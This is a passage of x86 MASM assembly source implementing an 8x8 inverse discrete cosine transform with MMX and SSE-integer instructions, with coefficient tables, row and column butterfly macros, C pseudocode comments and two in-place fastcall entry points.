round_frw_row dword RND_FRW_ROW, RND_FRW_ROW
tg_1_16 sword 13036, 13036, 13036, 13036 ; tg * (2<<16) + 0.5
tg_2_16 sword 27146, 27146, 27146, 27146 ; tg * (2<<16) + 0.5
tg_3_16 sword -21746, -21746, -21746, -21746 ; tg * (2<<16) + 0.5
cos_4_16 sword -19195, -19195, -19195, -19195 ; cos * (2<<16) + 0.5
ocos_4_16 sword 23170, 23170, 23170, 23170 ; cos * (2<<15) + 0.5
otg_3_16 sword 21895, 21895, 21895, 21895 ; tg * (2<<16) + 0.5
; assume SHIFT_INV_ROW == 12
;rounder_0 dword 65536, 65536
;rounder_4 dword 0, 0
;rounder_1 dword 7195, 7195
;rounder_7 dword 1024, 1024
;rounder_2 dword 4520, 4520
;rounder_6 dword 1024, 1024
;rounder_3 dword 2407, 2407
;rounder_5 dword 240, 240
; assume SHIFT_INV_ROW == 11
rounder_0 dword 65536, 65536
rounder_4 dword 0, 0
rounder_1 dword 3597, 3597
rounder_7 dword 512, 512
rounder_2 dword 2260, 2260
rounder_6 dword 512, 512
rounder_3 dword 1203, 1203
rounder_5 dword 120, 120
;=============================================================================
;
; The first stage iDCT 8x8 - inverse DCTs of rows
;
;-----------------------------------------------------------------------------
; The 8-point inverse DCT direct algorithm
;-----------------------------------------------------------------------------
;
; static const short w[32] = {
; FIX(cos_4_16), FIX(cos_2_16), FIX(cos_4_16), FIX(cos_6_16),
; FIX(cos_4_16), FIX(cos_6_16), -FIX(cos_4_16), -FIX(cos_2_16),
; FIX(cos_4_16), -FIX(cos_6_16), -FIX(cos_4_16), FIX(cos_2_16),
; FIX(cos_4_16), -FIX(cos_2_16), FIX(cos_4_16), -FIX(cos_6_16),
; FIX(cos_1_16), FIX(cos_3_16), FIX(cos_5_16), FIX(cos_7_16),
; FIX(cos_3_16), -FIX(cos_7_16), -FIX(cos_1_16), -FIX(cos_5_16),
; FIX(cos_5_16), -FIX(cos_1_16), FIX(cos_7_16), FIX(cos_3_16),
; FIX(cos_7_16), -FIX(cos_5_16), FIX(cos_3_16), -FIX(cos_1_16) };
;
; #define DCT_8_INV_ROW(x, y)
; {
; int a0, a1, a2, a3, b0, b1, b2, b3;
;
; a0 =x[0]*w[0]+x[2]*w[1]+x[4]*w[2]+x[6]*w[3];
; a1 =x[0]*w[4]+x[2]*w[5]+x[4]*w[6]+x[6]*w[7];
; a2 = x[0] * w[ 8] + x[2] * w[ 9] + x[4] * w[10] + x[6] * w[11];
; a3 = x[0] * w[12] + x[2] * w[13] + x[4] * w[14] + x[6] * w[15];
; b0 = x[1] * w[16] + x[3] * w[17] + x[5] * w[18] + x[7] * w[19];
; b1 = x[1] * w[20] + x[3] * w[21] + x[5] * w[22] + x[7] * w[23];
; b2 = x[1] * w[24] + x[3] * w[25] + x[5] * w[26] + x[7] * w[27];
; b3 = x[1] * w[28] + x[3] * w[29] + x[5] * w[30] + x[7] * w[31];
;
; y[0] = SHIFT_ROUND ( a0 + b0 );
; y[1] = SHIFT_ROUND ( a1 + b1 );
; y[2] = SHIFT_ROUND ( a2 + b2 );
; y[3] = SHIFT_ROUND ( a3 + b3 );
; y[4] = SHIFT_ROUND ( a3 - b3 );
; y[5] = SHIFT_ROUND ( a2 - b2 );
; y[6] = SHIFT_ROUND ( a1 - b1 );
; y[7] = SHIFT_ROUND ( a0 - b0 );
; }
;
;-----------------------------------------------------------------------------
;
; In this implementation the outputs of the iDCT-1D are multiplied
; for rows 0,4 - by cos_4_16,
; for rows 1,7 - by cos_1_16,
; for rows 2,6 - by cos_2_16,
; for rows 3,5 - by cos_3_16
; and are shifted to the left for better accuracy
;
; For the constants used,
; FIX(float_const) = (short) (float_const * (1<<15) + 0.5)
;
;=============================================================================
;=============================================================================
; MMX code
;=============================================================================
; Table for rows 0,4 - constants are multiplied by cos_4_16
tab_i_04 sword 16384, 16384, 16384, -16384 ; movq-> w06 w04 w02 w00
sword 21407, 8867, 8867, -21407 ; w07 w05 w03 w01
sword 16384, -16384, 16384, 16384 ; w14 w12 w10 w08
sword -8867, 21407, -21407, -8867 ; w15 w13 w11 w09
sword 22725, 12873, 19266, -22725 ; w22 w20 w18 w16
sword 19266, 4520, -4520, -12873 ; w23 w21 w19 w17
sword 12873, 4520, 4520, 19266 ; w30 w28 w26 w24
sword -22725, 19266, -12873, -22725 ; w31 w29 w27 w25
; Table for rows 1,7 - constants are multiplied by cos_1_16
tab_i_17 sword 22725, 22725, 22725, -22725 ; movq-> w06 w04 w02 w00
sword 29692, 12299, 12299, -29692 ; w07 w05 w03 w01
sword 22725, -22725, 22725, 22725 ; w14 w12 w10 w08
sword -12299, 29692, -29692, -12299 ; w15 w13 w11 w09
sword 31521, 17855, 26722, -31521 ; w22 w20 w18 w16
sword 26722, 6270, -6270, -17855 ; w23 w21 w19 w17
sword 17855, 6270, 6270, 26722 ; w30 w28 w26 w24
sword -31521, 26722, -17855, -31521 ; w31 w29 w27 w25
; Table for rows 2,6 - constants are multiplied by cos_2_16
tab_i_26 sword 21407, 21407, 21407, -21407 ; movq-> w06 w04 w02 w00
sword 27969, 11585, 11585, -27969 ; w07 w05 w03 w01
sword 21407, -21407, 21407, 21407 ; w14 w12 w10 w08
sword -11585, 27969, -27969, -11585 ; w15 w13 w11 w09
sword 29692, 16819, 25172, -29692 ; w22 w20 w18 w16
sword 25172, 5906, -5906, -16819 ; w23 w21 w19 w17
sword 16819, 5906, 5906, 25172 ; w30 w28 w26 w24
sword -29692, 25172, -16819, -29692 ; w31 w29 w27 w25
; Table for rows 3,5 - constants are multiplied by cos_3_16
tab_i_35 sword 19266, 19266, 19266, -19266 ; movq-> w06 w04 w02 w00
sword 25172, 10426, 10426, -25172 ; w07 w05 w03 w01
sword 19266, -19266, 19266, 19266 ; w14 w12 w10 w08
sword -10426, 25172, -25172, -10426 ; w15 w13 w11 w09
sword 26722, 15137, 22654, -26722 ; w22 w20 w18 w16
sword 22654, 5315, -5315, -15137 ; w23 w21 w19 w17
sword 15137, 5315, 5315, 22654 ; w30 w28 w26 w24
sword -26722, 22654, -15137, -26722 ; w31 w29 w27 w25
;-----------------------------------------------------------------------------
; One 8-point inverse-DCT row (plain MMX): interleave the 8 input words
; into even/odd halves, form the four even (a0..a3) and four odd (b0..b3)
; dot products with pmaddwd against TABLE, add ROUNDER, shift right by
; SHIFT_INV_ROW, and pack the eight results back to words at OUT.
DCT_8_INV_ROW_1 MACRO INP:REQ, OUT:REQ, TABLE:REQ, ROUNDER:REQ
movq mm0, mptr [INP] ; 0 ; x3 x2 x1 x0
movq mm1, mptr [INP+8] ; 1 ; x7 x6 x5 x4
movq mm2, mm0 ; 2 ; x3 x2 x1 x0
movq mm3, mptr [TABLE] ; 3 ; w06 w04 w02 w00
punpcklwd mm0, mm1 ; x5 x1 x4 x0
movq mm5, mm0 ; 5 ; x5 x1 x4 x0
punpckldq mm0, mm0 ; x4 x0 x4 x0
movq mm4, mptr [TABLE+8] ; 4 ; w07 w05 w03 w01
punpckhwd mm2, mm1 ; 1 ; x7 x3 x6 x2
pmaddwd mm3, mm0 ; x4*w06+x0*w04 x4*w02+x0*w00
movq mm6, mm2 ; 6 ; x7 x3 x6 x2
movq mm1, mptr [TABLE+32] ; 1 ; w22 w20 w18 w16
punpckldq mm2, mm2 ; x6 x2 x6 x2
pmaddwd mm4, mm2 ; x6*w07+x2*w05 x6*w03+x2*w01
punpckhdq mm5, mm5 ; x5 x1 x5 x1
pmaddwd mm0, mptr [TABLE+16] ; x4*w14+x0*w12 x4*w10+x0*w08
punpckhdq mm6, mm6 ; x7 x3 x7 x3
movq mm7, mptr [TABLE+40] ; 7 ; w23 w21 w19 w17
pmaddwd mm1, mm5 ; x5*w22+x1*w20 x5*w18+x1*w16
paddd mm3, mptr [ROUNDER] ; +rounder
pmaddwd mm7, mm6 ; x7*w23+x3*w21 x7*w19+x3*w17
pmaddwd mm2, mptr [TABLE+24] ; x6*w15+x2*w13 x6*w11+x2*w09
paddd mm3, mm4 ; 4 ; a1=sum(even1) a0=sum(even0)
pmaddwd mm5, mptr [TABLE+48] ; x5*w30+x1*w28 x5*w26+x1*w24
movq mm4, mm3 ; 4 ; a1 a0
pmaddwd mm6, mptr [TABLE+56] ; x7*w31+x3*w29 x7*w27+x3*w25
paddd mm1, mm7 ; 7 ; b1=sum(odd1) b0=sum(odd0)
paddd mm0, mptr [ROUNDER] ; +rounder
psubd mm3, mm1 ; a1-b1 a0-b0
psrad mm3, SHIFT_INV_ROW ; y6=a1-b1 y7=a0-b0
paddd mm1, mm4 ; 4 ; a1+b1 a0+b0
paddd mm0, mm2 ; 2 ; a3=sum(even3) a2=sum(even2)
psrad mm1, SHIFT_INV_ROW ; y1=a1+b1 y0=a0+b0
paddd mm5, mm6 ; 6 ; b3=sum(odd3) b2=sum(odd2)
movq mm4, mm0 ; 4 ; a3 a2
paddd mm0, mm5 ; a3+b3 a2+b2
psubd mm4, mm5 ; 5 ; a3-b3 a2-b2
psrad mm0, SHIFT_INV_ROW ; y3=a3+b3 y2=a2+b2
psrad mm4, SHIFT_INV_ROW ; y4=a3-b3 y5=a2-b2
packssdw mm1, mm0 ; 0 ; y3 y2 y1 y0
packssdw mm4, mm3 ; 3 ; y6 y7 y4 y5
movq mm7, mm4 ; 7 ; y6 y7 y4 y5
; No pshufw on plain MMX: swap word pairs with shift+or to order y4..y7.
psrld mm4, 16 ; 0 y6 0 y4
pslld mm7, 16 ; y7 0 y5 0
movq mptr [OUT], mm1 ; 1 ; save y3 y2 y1 y0
por mm7, mm4 ; 4 ; y7 y6 y5 y4
movq mptr [OUT+8], mm7 ; 7 ; save y7 y6 y5 y4
ENDM
;=============================================================================
; code for Pentium III
;=============================================================================
; Table for rows 0,4 - constants are multiplied by cos_4_16
tab_i_04_s sword 16384, 21407, 16384, 8867 ; movq-> w05 w04 w01 w00
sword 16384, 8867, -16384, -21407 ; w07 w06 w03 w02
sword 16384, -8867, 16384, -21407 ; w13 w12 w09 w08
sword -16384, 21407, 16384, -8867 ; w15 w14 w11 w10
sword 22725, 19266, 19266, -4520 ; w21 w20 w17 w16
sword 12873, 4520, -22725, -12873 ; w23 w22 w19 w18
sword 12873, -22725, 4520, -12873 ; w29 w28 w25 w24
sword 4520, 19266, 19266, -22725 ; w31 w30 w27 w26
; Table for rows 1,7 - constants are multiplied by cos_1_16
tab_i_17_s sword 22725, 29692, 22725, 12299 ; movq-> w05 w04 w01 w00
sword 22725, 12299, -22725, -29692 ; w07 w06 w03 w02
sword 22725, -12299, 22725, -29692 ; w13 w12 w09 w08
sword -22725, 29692, 22725, -12299 ; w15 w14 w11 w10
sword 31521, 26722, 26722, -6270 ; w21 w20 w17 w16
sword 17855, 6270, -31521, -17855 ; w23 w22 w19 w18
sword 17855, -31521, 6270, -17855 ; w29 w28 w25 w24
sword 6270, 26722, 26722, -31521 ; w31 w30 w27 w26
; Table for rows 2,6 - constants are multiplied by cos_2_16
tab_i_26_s sword 21407, 27969, 21407, 11585 ; movq-> w05 w04 w01 w00
sword 21407, 11585, -21407, -27969 ; w07 w06 w03 w02
sword 21407, -11585, 21407, -27969 ; w13 w12 w09 w08
sword -21407, 27969, 21407, -11585 ; w15 w14 w11 w10
sword 29692, 25172, 25172, -5906 ; w21 w20 w17 w16
sword 16819, 5906, -29692, -16819 ; w23 w22 w19 w18
sword 16819, -29692, 5906, -16819 ; w29 w28 w25 w24
sword 5906, 25172, 25172, -29692 ; w31 w30 w27 w26
; Table for rows 3,5 - constants are multiplied by cos_3_16
tab_i_35_s sword 19266, 25172, 19266, 10426 ; movq-> w05 w04 w01 w00
sword 19266, 10426, -19266, -25172 ; w07 w06 w03 w02
sword 19266, -10426, 19266, -25172 ; w13 w12 w09 w08
sword -19266, 25172, 19266, -10426 ; w15 w14 w11 w10
sword 26722, 22654, 22654, -5315 ; w21 w20 w17 w16
sword 15137, 5315, -26722, -15137 ; w23 w22 w19 w18
sword 15137, -26722, 5315, -15137 ; w29 w28 w25 w24
sword 5315, 22654, 22654, -26722 ; w31 w30 w27 w26
;-----------------------------------------------------------------------------
; One 8-point inverse-DCT row, SSE-integer variant: same math as
; DCT_8_INV_ROW_1 but uses pshufw (so the *_s coefficient tables have a
; different word order) and a final pshufw instead of shift+or to
; reorder y4..y7.
DCT_8_INV_ROW_1_s MACRO INP:REQ, OUT:REQ, TABLE:REQ, ROUNDER:REQ
movq mm0, mptr [INP] ; 0 ; x3 x2 x1 x0
movq mm1, mptr [INP+8] ; 1 ; x7 x6 x5 x4
movq mm2, mm0 ; 2 ; x3 x2 x1 x0
movq mm3, mptr [TABLE] ; 3 ; w05 w04 w01 w00
pshufw mm0, mm0, 10001000b ; x2 x0 x2 x0
movq mm4, mptr [TABLE+8] ; 4 ; w07 w06 w03 w02
movq mm5, mm1 ; 5 ; x7 x6 x5 x4
pmaddwd mm3, mm0 ; x2*w05+x0*w04 x2*w01+x0*w00
movq mm6, mptr [TABLE+32] ; 6 ; w21 w20 w17 w16
pshufw mm1, mm1, 10001000b ; x6 x4 x6 x4
pmaddwd mm4, mm1 ; x6*w07+x4*w06 x6*w03+x4*w02
movq mm7, mptr [TABLE+40] ; 7 ; w23 w22 w19 w18
pshufw mm2, mm2, 11011101b ; x3 x1 x3 x1
pmaddwd mm6, mm2 ; x3*w21+x1*w20 x3*w17+x1*w16
pshufw mm5, mm5, 11011101b ; x7 x5 x7 x5
pmaddwd mm7, mm5 ; x7*w23+x5*w22 x7*w19+x5*w18
paddd mm3, mptr [ROUNDER] ; +rounder
pmaddwd mm0, mptr [TABLE+16] ; x2*w13+x0*w12 x2*w09+x0*w08
paddd mm3, mm4 ; 4 ; a1=sum(even1) a0=sum(even0)
pmaddwd mm1, mptr [TABLE+24] ; x6*w15+x4*w14 x6*w11+x4*w10
movq mm4, mm3 ; 4 ; a1 a0
pmaddwd mm2, mptr [TABLE+48] ; x3*w29+x1*w28 x3*w25+x1*w24
paddd mm6, mm7 ; 7 ; b1=sum(odd1) b0=sum(odd0)
pmaddwd mm5, mptr [TABLE+56] ; x7*w31+x5*w30 x7*w27+x5*w26
paddd mm3, mm6 ; a1+b1 a0+b0
paddd mm0, mptr [ROUNDER] ; +rounder
psrad mm3, SHIFT_INV_ROW ; y1=a1+b1 y0=a0+b0
paddd mm0, mm1 ; 1 ; a3=sum(even3) a2=sum(even2)
psubd mm4, mm6 ; 6 ; a1-b1 a0-b0
movq mm7, mm0 ; 7 ; a3 a2
paddd mm2, mm5 ; 5 ; b3=sum(odd3) b2=sum(odd2)
paddd mm0, mm2 ; a3+b3 a2+b2
psrad mm4, SHIFT_INV_ROW ; y6=a1-b1 y7=a0-b0
psubd mm7, mm2 ; 2 ; a3-b3 a2-b2
psrad mm0, SHIFT_INV_ROW ; y3=a3+b3 y2=a2+b2
psrad mm7, SHIFT_INV_ROW ; y4=a3-b3 y5=a2-b2
packssdw mm3, mm0 ; 0 ; y3 y2 y1 y0
packssdw mm7, mm4 ; 4 ; y6 y7 y4 y5
movq mptr [OUT], mm3 ; 3 ; save y3 y2 y1 y0
pshufw mm7, mm7, 10110001b ; y7 y6 y5 y4
movq mptr [OUT+8], mm7 ; 7 ; save y7 y6 y5 y4
ENDM
;=============================================================================
;
;=============================================================================
;=============================================================================
;
; The first stage DCT 8x8 - forward DCTs of columns
;
; The outputs are multiplied
; for rows 0,4 - on cos_4_16,
; for rows 1,7 - on cos_1_16,
; for rows 2,6 - on cos_2_16,
; for rows 3,5 - on cos_3_16
; and are shifted to the left for rise of accuracy
;
;-----------------------------------------------------------------------------
;
; The 8-point scaled forward DCT algorithm (26a8m)
;
;-----------------------------------------------------------------------------
;
; #define DCT_8_FRW_COL(x, y)
;{
; short t0, t1, t2, t3, t4, t5, t6, t7;
; short tp03, tm03, tp12, tm12, tp65, tm65;
; short tp465, tm465, tp765, tm765;
;
; t0 = LEFT_SHIFT ( x[0] + x[7] );
; t1 = LEFT_SHIFT ( x[1] + x[6] );
; t2 = LEFT_SHIFT ( x[2] + x[5] );
; t3 = LEFT_SHIFT ( x[3] + x[4] );
; t4 = LEFT_SHIFT ( x[3] - x[4] );
; t5 = LEFT_SHIFT ( x[2] - x[5] );
; t6 = LEFT_SHIFT ( x[1] - x[6] );
; t7 = LEFT_SHIFT ( x[0] - x[7] );
;
; tp03 = t0 + t3;
; tm03 = t0 - t3;
; tp12 = t1 + t2;
; tm12 = t1 - t2;
;
; y[0] = tp03 + tp12;
; y[4] = tp03 - tp12;
;
; y[2] = tm03 + tm12 * tg_2_16;
; y[6] = tm03 * tg_2_16 - tm12;
;
; tp65 =(t6 +t5 )*cos_4_16;
; tm65 =(t6 -t5 )*cos_4_16;
;
; tp765 = t7 + tp65;
; tm765 = t7 - tp65;
; tp465 = t4 + tm65;
; tm465 = t4 - tm65;
;
; y[1] = tp765 + tp465 * tg_1_16;
; y[7] = tp765 * tg_1_16 - tp465;
; y[5] = tm765 * tg_3_16 + tm465;
; y[3] = tm765 - tm465 * tg_3_16;
;}
;
;=============================================================================
; Forward DCT of four columns (one 64-bit lane of 4 words per row).
; Rows are 16 bytes apart (x0..x7 / y0..y7 below). Implements the
; butterfly from the DCT_8_FRW_COL pseudocode above, with `one_corr`
; OR-ed in as the +0.5 rounding correction on intermediate products.
; NOTE(review): not invoked by the procs in this file - presumably kept
; for a forward-DCT build; confirm before removing.
DCT_8_FRW_COL_4 MACRO INP:REQ, OUT:REQ
LOCAL x0, x1, x2, x3, x4, x5, x6, x7
LOCAL y0, y1, y2, y3, y4, y5, y6, y7
x0 equ [INP + 0*16]
x1 equ [INP + 1*16]
x2 equ [INP + 2*16]
x3 equ [INP + 3*16]
x4 equ [INP + 4*16]
x5 equ [INP + 5*16]
x6 equ [INP + 6*16]
x7 equ [INP + 7*16]
y0 equ [OUT + 0*16]
y1 equ [OUT + 1*16]
y2 equ [OUT + 2*16]
y3 equ [OUT + 3*16]
y4 equ [OUT + 4*16]
y5 equ [OUT + 5*16]
y6 equ [OUT + 6*16]
y7 equ [OUT + 7*16]
movq mm0, x1 ; 0 ; x1
movq mm1, x6 ; 1 ; x6
movq mm2, mm0 ; 2 ; x1
movq mm3, x2 ; 3 ; x2
paddsw mm0, mm1 ; t1 = x[1] + x[6]
movq mm4, x5 ; 4 ; x5
psllw mm0, SHIFT_FRW_COL ; t1
movq mm5, x0 ; 5 ; x0
paddsw mm4, mm3 ; t2 = x[2] + x[5]
paddsw mm5, x7 ; t0 = x[0] + x[7]
psllw mm4, SHIFT_FRW_COL ; t2
movq mm6, mm0 ; 6 ; t1
psubsw mm2, mm1 ; 1 ; t6 = x[1] - x[6]
movq mm1, mptr tg_2_16 ; 1 ; tg_2_16
psubsw mm0, mm4 ; tm12 = t1 - t2
movq mm7, x3 ; 7 ; x3
pmulhw mm1, mm0 ; tm12*tg_2_16
paddsw mm7, x4 ; t3 = x[3] + x[4]
psllw mm5, SHIFT_FRW_COL ; t0
paddsw mm6, mm4 ; 4 ; tp12 = t1 + t2
psllw mm7, SHIFT_FRW_COL ; t3
movq mm4, mm5 ; 4 ; t0
psubsw mm5, mm7 ; tm03 = t0 - t3
paddsw mm1, mm5 ; y2 = tm03 + tm12*tg_2_16
paddsw mm4, mm7 ; 7 ; tp03 = t0 + t3
por mm1, mptr one_corr ; correction y2 +0.5
psllw mm2, SHIFT_FRW_COL+1 ; t6
pmulhw mm5, mptr tg_2_16 ; tm03*tg_2_16
movq mm7, mm4 ; 7 ; tp03
psubsw mm3, x5 ; t5 = x[2] - x[5]
psubsw mm4, mm6 ; y4 = tp03 - tp12
movq y2, mm1 ; 1 ; save y2
paddsw mm7, mm6 ; 6 ; y0 = tp03 + tp12
movq mm1, x3 ; 1 ; x3
psllw mm3, SHIFT_FRW_COL+1 ; t5
psubsw mm1, x4 ; t4 = x[3] - x[4]
movq mm6, mm2 ; 6 ; t6
movq y4, mm4 ; 4 ; save y4
paddsw mm2, mm3 ; t6 + t5
pmulhw mm2, mptr ocos_4_16 ; tp65 = (t6 + t5)*cos_4_16
psubsw mm6, mm3 ; 3 ; t6 - t5
pmulhw mm6, mptr ocos_4_16 ; tm65 = (t6 - t5)*cos_4_16
psubsw mm5, mm0 ; 0 ; y6 = tm03*tg_2_16 - tm12
por mm5, mptr one_corr ; correction y6 +0.5
psllw mm1, SHIFT_FRW_COL ; t4
por mm2, mptr one_corr ; correction tp65 +0.5
movq mm4, mm1 ; 4 ; t4
movq mm3, x0 ; 3 ; x0
paddsw mm1, mm6 ; tp465 = t4 + tm65
psubsw mm3, x7 ; t7 = x[0] - x[7]
psubsw mm4, mm6 ; 6 ; tm465 = t4 - tm65
movq mm0, mptr tg_1_16 ; 0 ; tg_1_16
psllw mm3, SHIFT_FRW_COL ; t7
movq mm6, mptr tg_3_16 ; 6 ; tg_3_16
pmulhw mm0, mm1 ; tp465*tg_1_16
movq y0, mm7 ; 7 ; save y0
pmulhw mm6, mm4 ; tm465*tg_3_16
movq y6, mm5 ; 5 ; save y6
movq mm7, mm3 ; 7 ; t7
movq mm5, mptr tg_3_16 ; 5 ; tg_3_16
psubsw mm7, mm2 ; tm765 = t7 - tp65
paddsw mm3, mm2 ; 2 ; tp765 = t7 + tp65
pmulhw mm5, mm7 ; tm765*tg_3_16
paddsw mm0, mm3 ; y1 = tp765 + tp465*tg_1_16
paddsw mm6, mm4 ; tm465*tg_3_16
pmulhw mm3, mptr tg_1_16 ; tp765*tg_1_16
por mm0, mptr one_corr ; correction y1 +0.5
paddsw mm5, mm7 ; tm765*tg_3_16
psubsw mm7, mm6 ; 6 ; y3 = tm765 - tm465*tg_3_16
movq y1, mm0 ; 0 ; save y1
paddsw mm5, mm4 ; 4 ; y5 = tm765*tg_3_16 + tm465
movq y3, mm7 ; 7 ; save y3
psubsw mm3, mm1 ; 1 ; y7 = tp765*tg_1_16 - tp465
movq y5, mm5 ; 5 ; save y5
movq y7, mm3 ; 3 ; save y7
ENDM
; Inverse DCT of four columns (one 64-bit lane of 4 words per row; rows
; 16 bytes apart). Butterfly network over tg_1/2/3_16 and ocos_4_16;
; results are shifted right by SHIFT_INV_COL. Instead of a separate
; SCRATCH buffer (the commented-out lines), b0/b3 are parked in the
; OUT+3*16 / OUT+5*16 rows and reloaded before those rows are finally
; overwritten with dst3/dst5 - so OUT may alias INP (in-place use below).
DCT_8_INV_COL_4 MACRO INP:REQ, OUT:REQ
movq mm0, qword ptr tg_3_16
movq mm3, qword ptr [INP+16*3]
movq mm1, mm0 ; tg_3_16
movq mm5, qword ptr [INP+16*5]
pmulhw mm0, mm3 ; x3*(tg_3_16-1)
movq mm4, qword ptr tg_1_16
pmulhw mm1, mm5 ; x5*(tg_3_16-1)
movq mm7, qword ptr [INP+16*7]
movq mm2, mm4 ; tg_1_16
movq mm6, qword ptr [INP+16*1]
pmulhw mm4, mm7 ; x7*tg_1_16
paddsw mm0, mm3 ; x3*tg_3_16
pmulhw mm2, mm6 ; x1*tg_1_16
paddsw mm1, mm3 ; x3+x5*(tg_3_16-1)
psubsw mm0, mm5 ; x3*tg_3_16-x5 = tm35
movq mm3, qword ptr ocos_4_16
paddsw mm1, mm5 ; x3+x5*tg_3_16 = tp35
paddsw mm4, mm6 ; x1+tg_1_16*x7 = tp17
psubsw mm2, mm7 ; x1*tg_1_16-x7 = tm17
movq mm5, mm4 ; tp17
movq mm6, mm2 ; tm17
paddsw mm5, mm1 ; tp17+tp35 = b0
psubsw mm6, mm0 ; tm17-tm35 = b3
psubsw mm4, mm1 ; tp17-tp35 = t1
paddsw mm2, mm0 ; tm17+tm35 = t2
movq mm7, qword ptr tg_2_16
movq mm1, mm4 ; t1
; movq qword ptr [SCRATCH+0], mm5 ; save b0
movq qword ptr [OUT+3*16], mm5 ; save b0
paddsw mm1, mm2 ; t1+t2
; movq qword ptr [SCRATCH+8], mm6 ; save b3
movq qword ptr [OUT+5*16], mm6 ; save b3
psubsw mm4, mm2 ; t1-t2
movq mm5, qword ptr [INP+2*16]
movq mm0, mm7 ; tg_2_16
movq mm6, qword ptr [INP+6*16]
pmulhw mm0, mm5 ; x2*tg_2_16
pmulhw mm7, mm6 ; x6*tg_2_16
; slot
pmulhw mm1, mm3 ; ocos_4_16*(t1+t2) = b1/2
; slot
movq mm2, qword ptr [INP+0*16]
pmulhw mm4, mm3 ; ocos_4_16*(t1-t2) = b2/2
psubsw mm0, mm6 ; t2*tg_2_16-x6 = tm26
movq mm3, mm2 ; x0
movq mm6, qword ptr [INP+4*16]
paddsw mm7, mm5 ; x2+x6*tg_2_16 = tp26
paddsw mm2, mm6 ; x0+x4 = tp04
psubsw mm3, mm6 ; x0-x4 = tm04
movq mm5, mm2 ; tp04
movq mm6, mm3 ; tm04
psubsw mm2, mm7 ; tp04-tp26 = a3
paddsw mm3, mm0 ; tm04+tm26 = a1
paddsw mm1, mm1 ; b1
paddsw mm4, mm4 ; b2
paddsw mm5, mm7 ; tp04+tp26 = a0
psubsw mm6, mm0 ; tm04-tm26 = a2
movq mm7, mm3 ; a1
movq mm0, mm6 ; a2
paddsw mm3, mm1 ; a1+b1
paddsw mm6, mm4 ; a2+b2
psraw mm3, SHIFT_INV_COL ; dst1
psubsw mm7, mm1 ; a1-b1
psraw mm6, SHIFT_INV_COL ; dst2
psubsw mm0, mm4 ; a2-b2
; movq mm1, qword ptr [SCRATCH+0] ; load b0
movq mm1, qword ptr [OUT+3*16] ; load b0
psraw mm7, SHIFT_INV_COL ; dst6
movq mm4, mm5 ; a0
psraw mm0, SHIFT_INV_COL ; dst5
movq qword ptr [OUT+1*16], mm3
paddsw mm5, mm1 ; a0+b0
movq qword ptr [OUT+2*16], mm6
psubsw mm4, mm1 ; a0-b0
; movq mm3, qword ptr [SCRATCH+8] ; load b3
movq mm3, qword ptr [OUT+5*16] ; load b3
psraw mm5, SHIFT_INV_COL ; dst0
movq mm6, mm2 ; a3
psraw mm4, SHIFT_INV_COL ; dst7
movq qword ptr [OUT+5*16], mm0
paddsw mm2, mm3 ; a3+b3
movq qword ptr [OUT+6*16], mm7
psubsw mm6, mm3 ; a3-b3
movq qword ptr [OUT+0*16], mm5
psraw mm2, SHIFT_INV_COL ; dst3
movq qword ptr [OUT+7*16], mm4
psraw mm6, SHIFT_INV_COL ; dst4
movq qword ptr [OUT+3*16], mm2
movq qword ptr [OUT+4*16], mm6
ENDM
_TEXT SEGMENT PARA PUBLIC USE32 'CODE'
;
; extern "C" __fastcall void idct8x8_mmx (short *src_result);
;
public @MMX_IDCT@4
; In-place 8x8 iDCT, plain-MMX path. __fastcall: the block pointer
; arrives in ecx. Eight row passes (rows 0/4, 1/7, 2/6, 3/5 share the
; tab_i_04/17/26/35 tables and per-row rounders), then two column
; passes: left four columns at +0, right four at +8 bytes (4 words).
@MMX_IDCT@4 proc near
mov eax, ecx ; source
DCT_8_INV_ROW_1 [eax+0], [eax+0], tab_i_04, rounder_0
DCT_8_INV_ROW_1 [eax+16], [eax+16], tab_i_17, rounder_1
DCT_8_INV_ROW_1 [eax+32], [eax+32], tab_i_26, rounder_2
DCT_8_INV_ROW_1 [eax+48], [eax+48], tab_i_35, rounder_3
DCT_8_INV_ROW_1 [eax+64], [eax+64], tab_i_04, rounder_4
DCT_8_INV_ROW_1 [eax+80], [eax+80], tab_i_35, rounder_5
DCT_8_INV_ROW_1 [eax+96], [eax+96], tab_i_26, rounder_6
DCT_8_INV_ROW_1 [eax+112], [eax+112], tab_i_17, rounder_7
DCT_8_INV_COL_4 [eax+0],[eax+0]
DCT_8_INV_COL_4 [eax+8],[eax+8]
ret
@MMX_IDCT@4 ENDP
_TEXT ENDS
_TEXT SEGMENT PARA PUBLIC USE32 'CODE'
;
; extern "C" __fastcall void idct8x8_sse (short *src_result);
;
public @SSEMMX_IDCT@4
; In-place 8x8 iDCT, SSE-integer (pshufw) path. Identical structure to
; @MMX_IDCT@4 but uses the *_s row macro and its re-ordered *_s tables.
@SSEMMX_IDCT@4 proc near
mov eax, ecx ; source
DCT_8_INV_ROW_1_s [eax+0], [eax+0], tab_i_04_s, rounder_0
DCT_8_INV_ROW_1_s [eax+16], [eax+16], tab_i_17_s, rounder_1
DCT_8_INV_ROW_1_s [eax+32], [eax+32], tab_i_26_s, rounder_2
DCT_8_INV_ROW_1_s [eax+48], [eax+48], tab_i_35_s, rounder_3
DCT_8_INV_ROW_1_s [eax+64], [eax+64], tab_i_04_s, rounder_4
DCT_8_INV_ROW_1_s [eax+80], [eax+80], tab_i_35_s, rounder_5
DCT_8_INV_ROW_1_s [eax+96], [eax+96], tab_i_26_s, rounder_6
DCT_8_INV_ROW_1_s [eax+112], [eax+112], tab_i_17_s, rounder_7
DCT_8_INV_COL_4 [eax+0],[eax+0]
DCT_8_INV_COL_4 [eax+8],[eax+8]
ret
@SSEMMX_IDCT@4 ENDP
_TEXT ENDS
END |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.